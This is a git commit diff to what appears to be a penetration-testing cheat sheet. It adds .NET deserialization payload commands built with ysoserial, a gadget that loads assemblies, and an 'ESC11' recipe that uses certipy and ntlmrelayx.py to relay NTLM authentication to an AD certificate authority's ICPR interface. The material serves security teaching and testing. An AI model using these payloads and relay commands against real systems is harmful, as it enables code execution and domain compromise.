ESC11 - Relay NTLM to ICPR

This commit is contained in:
Swissky 2022-11-21 10:48:27 +01:00
parent 2ed3c03e78
commit cbb2137f3b
2 changed files with 44 additions and 5 deletions

View File

@ -5,10 +5,12 @@
* [Detection](#detection) * [Detection](#detection)
* [Tools](#tools) * [Tools](#tools)
* [Formatters](#formatters) * [Formatters](#formatters)
* [XmlSerializer](#) * [XmlSerializer](#xmlserializer)
* [DataContractSerializer](#) * [DataContractSerializer](#datacontractserializer)
* [JSON.NET](#) * [NetDataContractSerializer](#netdatacontractserializer)
* [BinaryFormatter](#) * [LosFormatter](#losformatter)
* [JSON.NET](#jsonnet)
* [BinaryFormatter](#binaryformatter)
* [POP Gadgets](#pop-gadgets) * [POP Gadgets](#pop-gadgets)
* [References](#references) * [References](#references)
@ -73,6 +75,8 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
### NetDataContractSerializer ### NetDataContractSerializer
> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`.
* In C# source code, look for `NetDataContractSerializer().ReadObject()`. * In C# source code, look for `NetDataContractSerializer().ReadObject()`.
* Payload output: **XML** * Payload output: **XML**
@ -80,6 +84,14 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t .\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
``` ```
### LosFormatter
* Use `BinaryFormatter` internally.
```ps1
.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
```
### JSON.NET ### JSON.NET
@ -132,6 +144,17 @@ List of popular gadgets used in common payloads.
```cs ```cs
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>(); ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
``` ```
* **System.Configuration.Install.AssemblyInstaller**
* Execute payload with Assembly.Load
```cs
// System.Configuration.Install.AssemblyInstaller
public void set_Path(string value){
if (value == null){
this.assembly = null;
}
this.assembly = Assembly.LoadFrom(value);
}
```
## References ## References

View File

@ -85,6 +85,7 @@
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [ESC9 - No Security Extension](#esc9---no-security-extension) - [ESC9 - No Security Extension](#esc9---no-security-extension)
- [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr)
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- [Pass-The-Certificate](#pass-the-certificate) - [Pass-The-Certificate](#pass-the-certificate)
- [Active Directory Federation Services](#active-directory-federation-services) - [Active Directory Federation Services](#active-directory-federation-services)
@ -2589,6 +2590,20 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
# Add -domain <domain> to your command line since there is no domain specified in the certificate. # Add -domain <domain> to your command line since there is no domain specified in the certificate.
``` ```
#### ESC11 - Relaying NTLM to ICPR
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
Requirements:
* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork
* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork
Exploitation:
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
```ps1
ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
```
#### Certifried CVE-2022-26923 #### Certifried CVE-2022-26923
@ -4106,3 +4121,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)